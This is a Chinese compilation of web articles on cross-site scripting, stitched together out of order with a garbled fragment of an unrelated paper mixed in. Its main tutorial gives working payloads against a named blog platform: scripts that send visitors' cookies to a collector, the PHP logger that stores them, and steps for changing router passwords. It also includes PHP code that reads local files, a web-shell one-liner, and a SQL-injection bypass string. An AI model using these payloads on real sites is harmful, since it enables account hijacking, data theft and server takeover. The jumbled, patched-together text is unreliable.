跨站脚本攻击实例解析
跨站点脚本编制详解

跨站点脚本编制详解“跨站点脚本编制”攻击是⼀种隐私违例,可让攻击者获取合法⽤户的凭证,并在与特定 Web 站点交互时假冒这位⽤户。
这个攻击⽴⾜于下列事实:Web 站点中所包含的脚本直接将⽤户在 HTML 页⾯中的输⼊(通常是参数值)返回,⽽不预先加以清理。
如果脚本在响应页⾯中返回由 JavaScript 代码组成的输⼊,浏览器便可以执⾏输⼊中的代码。
因此,有可能形成指向站点的若⼲链接,且其中⼀个参数是由恶意的 JavaScript 代码组成。
该代码将在站点上下⽂中(由⽤户浏览器)执⾏,这授权它通过⽤户浏览器访问⽤户所拥有的站点 Cookie 以及站点的其他窗⼝。
攻击依照下列⽅式继续进⾏:攻击者诱惑合法⽤户单击攻击者⽣成的链接。
⽤户单击该链接时,便会⽣成对于 Web 站点的请求,其中的参数值含有恶意的 JavaScript 代码。
如果 Web 站点将这个参数值嵌⼊在响应的 HTML 页⾯中(这正是站点问题的本质所在),恶意代码便会在⽤户浏览器中运⾏。
脚本可能执⾏的操作如下:[1] 将⽤户的 cookie(针对合法站点)发送给攻击者。
[2] 将可通过 DOM(URL、表单字段等)访问的信息发送给攻击者。
结果是在易受攻击的站点上,受害⽤户的安全和隐私受到侵害。
部分注意事项如下:[1] 虽然受攻击的 Web 站点涉⼊其中,但它没有直接受害。
它被⽤作攻击者发送的恶意脚本的“跳板”,⽤来以合法⾝份返回受害者的浏览器。
不过,由于受害者的隐私是在特定站点的上下⽂中受到侵害,并且由于站点有直接责任,因此,这将视为站点的安全缺陷。
[2] 如果受害的⽤户所访问的站点由攻击者来维护,攻击者便可以使⽤ Web 站点链接来提供恶意的链接。
如果攻击者知道⽤户的电⼦邮件地址,且⽤户的电⼦邮件客户端使⽤浏览器来呈现 HTML 消息,恶意的链接也可以由电⼦邮件来提供。
[3] ⽤户输⼊在表单字段值(即 URL 参数)中最常见,但也有已知的攻击将恶意的代码嵌⼊路径、查询,或 HTTP Referrer 头中,甚⾄是嵌⼊ Cookie 中。
Web前端开发实训案例教程初级前端跨站脚本攻击与防御

Web前端开发实训案例教程初级前端跨站脚本攻击与防御近年来,随着互联网的普及和应用场景的不断增加,Web前端开发行业迅速崛起。
然而,伴随着Web技术的迅速发展,网络安全问题也日益凸显出来。
而其中一种最为常见、危害性较大的安全漏洞就是跨站脚本攻击(Cross-Site Scripting, XSS)。
本文将从初级前端开发者的角度出发,为大家介绍跨站脚本攻击的原理与防御方法。
一、跨站脚本攻击的原理1.1 什么是跨站脚本攻击跨站脚本攻击是指攻击者利用Web应用程序对用户进行攻击的一种手段。
攻击者通过在目标网页中插入恶意的代码,当用户浏览该网页时,恶意代码会被执行,从而导致用户的信息泄露或者受到其他形式的攻击。
1.2 跨站脚本攻击的分类跨站脚本攻击可以分为存储型、反射型和DOM型三种类型。
1.2.1 存储型攻击存储型攻击是指攻击者将恶意代码存储在目标网站的数据库中,当用户请求某个页面时,服务器会将数据库中的恶意代码返回给用户,从而导致恶意代码在用户的浏览器中执行。
1.2.2 反射型攻击反射型攻击是指攻击者将恶意代码作为URL参数发送给目标网站的服务器,然后服务器将恶意代码反射给用户的浏览器执行。
与存储型攻击不同的是,反射型攻击不需要将恶意代码存储在目标网站的数据库中。
1.2.3 DOM型攻击DOM型攻击是指攻击者通过修改网页的DOM结构,从而实现对用户的攻击。
DOM(Document Object Model)是指HTML页面的文档对象模型。
攻击者可以通过修改DOM结构来插入恶意代码,从而对用户进行攻击。
二、跨站脚本攻击的防御方法2.1 输入过滤与转义对于用户输入的内容,特别是涉及到输出到网页的内容,开发者应该进行输入过滤与转义,以防止恶意代码的插入。
常见的转义方法包括HTML实体转义和URL编码转义。
2.2 设置HttpOnly标志HttpOnly是一种Cookie属性,当使用HttpOnly标志时,JavaScript 无法通过document.cookie等方式获取Cookie的值,从而有效防止了跨站脚本攻击。
网络安全常见漏洞攻击案例分析

网络安全常见漏洞攻击案例分析随着信息时代的到来,网络安全问题变得愈发突出。
在这个数字化的世界中,各种网络攻击和漏洞都可能导致个人隐私泄露、金融损失以及社会秩序的混乱。
因此,了解和分析常见的网络安全漏洞攻击案例,对于保护我们的网络安全具有重要意义。
本文将针对几种常见的网络安全漏洞攻击案例进行深入分析。
1. XSS(跨站脚本)攻击XSS攻击是一种通过向网页中插入恶意脚本来实现的攻击方式。
攻击者可以通过篡改前端输入框、URL参数等方式,使用户在浏览网页时执行恶意脚本,从而获取用户的敏感信息或者进行其他恶意操作。
例如,攻击者可以通过在论坛评论中嵌入恶意代码,窃取用户的登录凭证,进而控制用户的账号。
2. CSRF(跨站请求伪造)攻击CSRF攻击是一种通过伪装合法的请求来获取用户信息或执行非法操作的网络攻击手段。
攻击者可以通过各种方式引诱用户点击恶意链接或访问受控的网站,从而实现对用户账号的操作。
举例来说,攻击者可以通过在邮件中插入恶意链接,诱使用户在不经意间发起跨站请求,导致用户帐户被盗。
3. SQL注入攻击SQL注入攻击是一种利用Web应用程序的漏洞来操作数据库的攻击方式。
攻击者可以通过在用户输入的数据中注入恶意的SQL语句,从而篡改、删除或者泄露数据库中的数据。
例如,攻击者可以通过在登录表单中输入“'or'1'='1”这样的注入代码,绕过认证进行非法访问。
4. DDos(分布式拒绝服务)攻击DDoS攻击是一种通过占用目标服务器资源来使其过载,从而导致正常用户无法访问的攻击方式。
攻击者可以通过大量的恶意请求和僵尸网络发起DDoS攻击,使目标服务器无法正常响应合法用户的请求。
这种攻击方式可以严重影响网络服务的可用性和稳定性。
5. Wi-Fi劫持攻击Wi-Fi劫持攻击是一种通过篡改或者欺骗用户的无线网络连接,窃取用户信息或者截取未加密的数据包的攻击方式。
攻击者可以在公共场所设置恶意的Wi-Fi热点,当用户连接到这些热点时,攻击者可以窃取其敏感信息,如用户名、密码等。
DVWA——XSS(跨站脚本攻击)

DVWA——XSS(跨站脚本攻击)XSS概念:XSS攻击全称跨站脚本攻击,XSS是⼀种经常出现在web应⽤中的计算机安全漏洞,它允许恶意web⽤户将代码植⼊到提供给其它⽤户使⽤的页⾯中。
⽐如这些代码包括HTML代码和客户端脚本。
XSS有三种:反射型XSS:只是简单地把⽤户输⼊的数据反射给浏览器,简单来说,⿊客往往需要⽤户诱使⽤户点击⼀个恶意链接,才能攻击成功。
存储型XSS:将⽤户输⼊的数据存储在服务器端。
DOM XSS:通过修改页⾯的DOM节点形成的XSS。
(可能是存储型也可能使反射型)反射型XSS:Low级:<?php// Is there any input?if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Feedback for end userecho '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';}>我们可以看到,代码直接引⽤了name参数,并没有任何的过滤与检查,存在明显的XSS漏洞。
所以我们构造payload语句:<script>alert(/111/)</script>,可以看到直接就执⾏了我们的js代码。
在www⽬录下创建⼀个cookie.php⽂件,内容如下:<?php$cookie=$_GET['cookie'];//将get请求参数存储到cookie变量中file_put_contents('cookie.txt',$cookie);//把偷取的⽤户cookie写到cookie.txt⽂件中>编写js代码将页⾯的cookie发送到cookie.php中:<script>document.location='http://127.0.0.1/cookie.php/?cookie='+document.cookie;</script>#后⾯的参数要进⾏URL编码,页⾯发⽣跳转后,我们发现在WWW⽬录下多了个 cookie⽂件,打开发现成功拿到了cookie。
详解XSS跨站脚本攻击

XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用XSS得到目标服务器的shell。技术虽然是老技术,但是其思路希望对大家有帮助。
有的时候,当我们对于目标程序找不到可以利用的跨站点,这个时候我们可以利用可以从外部入手,利用我们要拿下的是它的论谈,论谈的安全性做的很好,但其留言板却存在跨站漏洞,这个时候我们可以在留言板里写入跨站语句,跨站语句为以表单的方式向论谈提交提升权限的语句,如上面的bbsxp加asp 扩展的语句。当然我们可利用后台的备份功能直接得到一个shell。
二、来自内部的跨站攻击
寻找跨站漏洞
如果有代码的话比较好办,我们主要看代码里对用户输入的地方和变量有没有做长度和对”<”,”>”,”;”,”’”等字符是否做过滤。还有要注意的是对于标签的闭合,像测试QQ群跨站漏洞的时候,你在标题处输入<script>alert(‘test’)</script>,代码是不会被执行的,因为在源代码里,有其它的标签未闭合,如少了一个</script>,这个时候,你只要闭合一个</script>,代码就会执行,如:你在标题处输入</script><script>alert(‘test’)</script>,这样就可以弹出一个test的框。
同样发个贴子等,只要管理员打开了,就会加了一个扩展名为asp (有空格)的上传扩展,这个时候,你只要上传一个newmm.asp (有空格)就可以得到一个shell.
XSS跨站脚本攻击分析

入 跨站代 码 , 如 <MG S C= a a cit r 小 志”) 例 I R jv s r :et p s (“ J : ”>,
随着 WE 20应 用 的 深入 ,越来 越 多 的企 业 采 用 基 于动 态 然 后点 提交 。 B. 23 窃 取管理 员帐 号 . 当攻 击 者成 功 置 人跨 站 脚 本 时 ,攻 击者 就 伪造 一 个 密 码验
s to k f OGON’, SS a s) e c o i ’L e md (P s) : S =fp n ’ i x’, ‘ b : f o e ( gf t . t a ’) f i (f¥o i. l wreS, 1gn t I”. p s. \\ ) I ¥ a s ” rn : fls (f co eS) : }
{
意 代码 的请 求 之后 会 产 成一 个 包 含 恶意 代 码 的仿 真 页 面 , 当用 户 访 问这 些 仿 真 页面 时 就会 将 自己 的一 些 重 要 的信 息 泄露 给 攻 击 者 。在 形成 X S攻击 漏 洞 时 ,其 与 S 注 入攻 击 类似 ,都 是 S QL 由于 We b系统 的代 码编 写人 员不 严谨 的字 符限 制而 导致 的 。
的共享 ,可 能 会给 黑 客或 有 恶意 的人提 供 进行 系统 攻击 的机 会 ,
器 设 备等 ,它们 均 是 可 以共 享 的 资源 。 该层 为整 个 网格 教 学 平 也 可 能使 得 病 毒 有机 可 乘 ,这 些 问题 都 必 须 解决 。 如防 止 非法 台的基础 。 用户进 入校 园网格 系统 或窃 取用 户与校 园 网格之 间 的通信 内容 ; 操 作 系统 层 :网格 操 作 系统 是 基 于 底端 网格 硬件 开 发 的 用 保 障任 务在 提 交 、存 储和 迁移 时不 被 非法访 问 ,保证 安全传 输 ;
XSS(跨站脚本攻击)分析与实战

XSS(跨站脚本攻击)分析与实战⽂章⽬录⼀、漏洞原理1、XSS简介:XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。
XSS是最常见的 Web 应⽤程序安全漏洞之⼀,这类漏洞能够使攻击者嵌⼊恶意脚本代码(⼀般是JS代码)到正常⽤户会访问到的页⾯中,当正常⽤户访问该页⾯时,恶意脚本代码将会在⽤户的浏览器上执⾏,从⽽达到恶意攻击⽤户的⽬的。
从上述内容可知,XSS属于客户端攻击,受害者最终是⽤户。
但不要以为受害者是⽤户,就认为跟⾃⼰的⽹站、服务器安全没有关系,不要忘记⽹站管理⼈员也属于⽤户之⼀,这就意味着 XSS 可以攻击 “服务器端”。
因为管理员要⽐普通⽤户的权限⼤得多,⽽攻击者就有可能靠管理员⾝份作为“跳板”实施攻击。
2、XSS原理解析:XSS攻击在⽹页中嵌⼊的恶意脚本代码⼀般是使⽤ JavaScript 语⾔,JavaScript 可以获取⽤户的Cookie、改变⽹页内容、URL跳转,那么存在XSS漏洞的⽹站,就可以盗取⽤户Cookie、⿊掉页⾯、导航到恶意⽹站,⽽攻击者需要做的仅仅是向Web页⾯中注⼊JavaScript 代码。
下⾯是⼀个简单的XSS漏洞实例,代码如下:<html><head><meta content="text/html;charset=utf-8"/><title>xss漏洞⽰例</title></head><body><center><h6>把输⼊的字符串输出</h6><form action="#" method="get"><h6>请输⼊</h6><input type="text" name="xss"><br /><input type="submit" value="确定"></form><hr><?phpif (isset($_GET['xss'])) {echo '<input type="text" value="'.$_GET['xss'].'">';}else{echo '<input type="text">';}></center></body></html>在代码中,通过GET获取参数xss的值,然后通过echo输出⼀个input标签,并将xss的值放⼊input标签的value中。
跨站脚本攻击XSS(CrossSiteScript)的原理与常见场景分析

跨站脚本攻击XSS(CrossSiteScript)的原理与常见场景分析前⾔前段时间在⽹上看到⼀个,好奇之下进去看了看。
胜利的条件是你录⼊⼀个串,让其调⽤prompt(1) 。
发现⾥⾯有好多想不到的东西,今天终于悠闲了来这⾥说说XSS。
XSS 原理跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。
恶意攻击者往Web页⾯⾥插⼊恶意Script代码,当⽤户浏览该页之时,嵌⼊其中Web⾥⾯的Script代码会被执⾏,从⽽达到恶意攻击⽤户的⽬的。
XSS 常见场景⼀些私⼈的博客,攻击者恶意评论,弹出alert,这种充其量也就是⼀个玩笑。
但是如果是盗窃cookie,异常提交请求,这些就⽐较难受了。
prompt(1)chrome 版本 62.0.3202.75(正式版本)(64 位)function escape(input) {// warm up// script should be executed without user interactionreturn '<input type="text" value="' + input + '">';}第⼀个这是⼀个开胃菜,没有做任何校验,这种不设防的在现在已经很少了。
他把值直接拼⼊字符串,组成⼀个DOM input标签,那我们只要正确的把标签闭合掉就可以调⽤了。
"><script>prompt(1)</script> ,拼出来的字符串为<input type="text" value=""><script>prompt(1)</script>"> ,这样就等于插⼊了我们的代码。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
图6 谷歌浏览器 Chrome 情况如图 7 所示:
图7 搜狗浏览器下的情况如图 8 所示:
跨站脚本攻击实例解析
作者:泉哥 主页:
前言 跨站攻击,即 Cross Site Script Execution(通常简写为 XSS,因为 CSS 与层叠样式表同名,故改为 XSS) 是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的 HTML 代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 很多人对于 XSS 的利用大多停留在弹框框的程度,一些厂商对 XSS 也是不以为然,都认为安全级别 很低,甚至忽略不计。本文旨在讲述关于跨站攻击的利用方式,并结合实例进行分析。
图3 很明显,我们已经成功窃取到 cookie 了,剩下的事相信大家都知道,这里就不再赘述。 二.渗透路由器 对于处于内网中的用户,我们可以利用XSS来更改路由器密码。我们可以借助默认的密码来登陆路由 器,比如URL:http://admin:admin@192.168.1.1,其实很多路由器都是使用默认密码,我这里这台也 是如此,直接以admin作为用户名和密码。首先我们先利用Firefox插件Live HTTP headers获取请求头, 如图 4 所示:
4: 基于 webkit 内核:google chrome、遨游 3.0、safari 等浏览器对本地执行的 ajax 权限没做任何访问限制.
以上测试是利用 ajax 来读取文件的。但是我在 windows7 平台上用 php 测试各个最新版浏览器时发现: 1、 Firefox 3.6.10、搜狗浏览器 2.2.0.1423、Maxthon 2.5.14、IE8、Chrome 7.0.513.0、360 浏览器 3.5、 世界之窗 3.2、TT 浏览器 4.8 均可跨目录读取本地文件。 2、 Opera 10.70 不允许读取本地文件,若是读取本地文件会直接给出."\n Cookie: ".$cookie."\n\n\n"); //写入文件
fclose($fp); //关闭文件
header("Locatio 下 来 我 们 访 问 博 客 首 页 , 我 这 里 以 为 测 试 地 址 , 访 问 后 我 们 打 开 http://localhost/cookie.txt 看看cookie.txt 文件是否被创建并写入数据,结果如图 3 所示:
四、Hacking HomePage 相信对于很多初学 Hack 的朋友,都会对那一张张的黑页独有情钟,尤其是当前中美黑客大战中,中 国人挂在白宫网站上黑页,让人至今记忆犹新!本节主要就是利用 XSS 来黑掉别人博客主页,但这 里的黑页与入侵服务器来修改主页有很大区别,利用 XSS 来黑页其实并不是修改服务器上的页面, 它只是通过 JavaScript,CSS 及其它 WEB 技术来修改页面。这主要就是通过注入 js 代码,然后在后台 执行以达到盗取 cookie 或劫持浏览器的目的,这些代码往往都是一些 HTML 或 JavaScript 代码(往往 是使用 InnerHTML 或者 document.write 命令来动态创建文本,图像及其它数据信息)。在本文编写过 程中,我又发现了博客大巴上的几处跨站漏洞,就在“博客设置”中,这里我们就以其中“基础设置” 下的“自定义 header”一栏为例。我们先在向其写入下列语句: <script src ="http://localhost/1.js"></script> 接下来编写 1.js 代码: document.write("<center><h1><font color=#FF0000>Hacked By riusksk</font></h1></cneter>"); document.write("<center><h2><font color=#000000>Just for test !</font><h2></center><p><img
$agent = $_SERVER['HTTP_USER_AGENT']; //用户浏览器类型
$fp = fopen('cookie.txt', 'a');
//打开 cookie.txt,若不存在则创建它
fwrite($fp," IP: " .$ip. "\n Date and Time: " .$time. "\n User Agent:".$agent."\n Referer:
漏洞测试 关于对 XSS 的漏洞测试,这里就以博客大巴为例进行测试,最近我也在上面发现了多处跨站漏洞, 其中两处已公布在 WooYun 网站上,其主要内容如下:
漏洞详情 简要描述: 博客大巴存储型 XSS 漏洞 详细说明: 在“个人信息设置”的“附加信息”一项中,由于对“个人简介”的内容过滤不严,导致可在博客首页实现跨站,而 在下方“添加一段附加信息”中,由于对“信息标题”内容过滤不严,同样可导致跨站的出现。
<?php
$cookie = $_GET['cookie'];
//以 GET 方式获取 cookie 变量值
$ip = getenv ('REMOTE_ADDR');
//远程主机 IP 地址
$time=date('Y-m-d g:i:s');
//以“年-月-日 时:分:秒”的格式显示时间
$referer=getenv ('HTTP_REFERER'); //链接来源
图5 可见密码已经修改成功!
三、读取本地文件 在不同的浏览器中对本地文件的读取有着不同的限制,之前 XEYE team 曾有过统计,具体内容如下:
1: IE6 可读取无限制本地文件.ie8 以及相应版本的 trident 内核浏览器对 ajax 本地执行时的权限控制得很死的,看 来 MS 对 IE 这类安全风险比较重视。
2: FF3.0.8 及以下版本允许本地执行的 ajax 访问当前目录下的文件内容。其他目录暂无法访问。 3: opera9.64 及以下版本允许通过指定 url 为 file://协议进行访问;如果文件在当前目录下,则不需要指定 file://
协议;如果文件在同一盘符下甚至可以超越目录的方式访问:../../boot.ini。
但我刚又测试了一下,发现官方只修补了其中一个漏洞(个人简介),而另一个漏洞得在博客管理后 台才能触发,利用价值不大。与此同时我在对博客模板的测试中,又发现了五处跨站漏洞,估计这些 漏洞其实很早就有人发现了,只是没人公布或者报给 blogbus 后仍未修补。这次报给 WooYun 的主要 目的是让 blogbus 修补此漏洞,因为我的博客就在上面!^_^ 其余五处漏洞分别在“编辑自定义模板” 中,由于对代码模块 head,index,index-post,detail,detail-post 等处的代码过滤不严,导致跨站的发生, 分别向其写入<img src="#" onerror=alert("head")></img>,为便于区别,我将提示语句更改为对应的名 称,前三项在首页可触发脚本,后两项需打开文章才可触发,测试结果如图 1、2 所示:
$contents .= fread($handle, 1024); } $contents=urldecode($contents); echo $contents; //$fp = fopen('info.txt', 'a'); //fwrite($fp,$contents); //fclose($fp); fclose($handle); ?>
我测试用的 PHP 脚本(该脚本位于 D:\riusksk\Webroot\reader.php)代码如下:
<?php $handle = fopen("file://c:\sysiclog.txt", "rb") or die("can't open file"); $contents = ''; while (!feof($handle)) {
图8 傲游浏览器下的情况:
图9 IE8 下的情况如图 10 所示:
图 10 360 安全浏览器情况如图 11 所示:
世界之窗情况如图 12 所示:
图 11
TT 浏览器情况如图 13 所示:
图 12
图 13 Opera 下直接给出警告如图 14 所示:
图 14 当然,这些漏洞除了读取文件外,还可写入一句话木马<?php eval($_POST[cmd])?>,为进一步提权提 供条件。
图 1(在首页触发)
图 2(打开文章触发) 对于其它网站的测试基本也是大同小异,除了手工测试外,你还可使用其它一些自动扫描工具,比如 Acunetix Web Scanner……
漏洞利用 一、窃取 Cookie 对于跨站的攻击方法,使用最多的莫过于 cookie 窃取了,获取 cookie 后直接借助“明小子”工具或 其它可修改 cookie 的浏览器(如装有 Cookies Edit 插件的 Firefox)将 cookie 修改为获取的 cookie,这 样即可获得博客的管理权限。 首先,我们在自定义模板的 head 代码模块中写入 <script>document.write('<img src="http://localhost/test.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script> 或者 <script>document.location = 'http://localhost/test.php?cookie=' + document.cookie;</script> 这里我把脚本放在本机上,你可以根据脚本地址来更改上面的 localhost 地址。以上两个均可达到同等 效果,但就隐蔽性而言,前者的隐蔽性会更强些,读者可自行选择,当然也有其它语句可达到一样的 目的,就看你如何发挥了。接下来我们来编写上面的 test.php 文件,它主要用于获取对方的 cookie, 其源代码如下: